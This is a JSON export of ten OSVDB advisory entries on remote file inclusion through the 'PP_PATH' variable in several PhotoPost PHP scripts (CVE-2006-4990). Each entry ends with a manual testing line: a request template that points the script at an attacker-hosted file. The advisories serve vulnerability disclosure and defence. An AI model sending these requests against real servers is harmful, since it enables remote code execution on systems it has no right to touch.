{"osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-pa.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-pa.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-pa.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32235", "id": "OSVDB:32235", "title": "PhotoPost PHP adm-pa.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-photo.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-photo.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-photo.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32236", "id": "OSVDB:32236", "title": "PhotoPost PHP adm-photo.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-users.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-users.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-users.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32241", "id": "OSVDB:32241", "title": "PhotoPost PHP adm-users.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the addfav.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the addfav.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/addfav.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32221", "id": "OSVDB:32221", "title": "PhotoPost PHP addfav.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-cinc.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-cinc.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-cinc.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32226", "id": "OSVDB:32226", "title": "PhotoPost PHP adm-cinc.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uploadphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uploadphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/uploadphoto.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32251", "id": "OSVDB:32251", "title": "PhotoPost PHP uploadphoto.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-templ.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-templ.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-templ.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32239", "id": "OSVDB:32239", "title": "PhotoPost PHP adm-templ.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ecard.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ecard.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/ecard.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32245", "id": "OSVDB:32245", "title": "PhotoPost PHP ecard.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-index.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-index.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-index.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32230", "id": "OSVDB:32230", "title": "PhotoPost PHP adm-index.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-modcom.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-modcom.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-modcom.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32231", "id": "OSVDB:32231", "title": "PhotoPost PHP adm-modcom.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}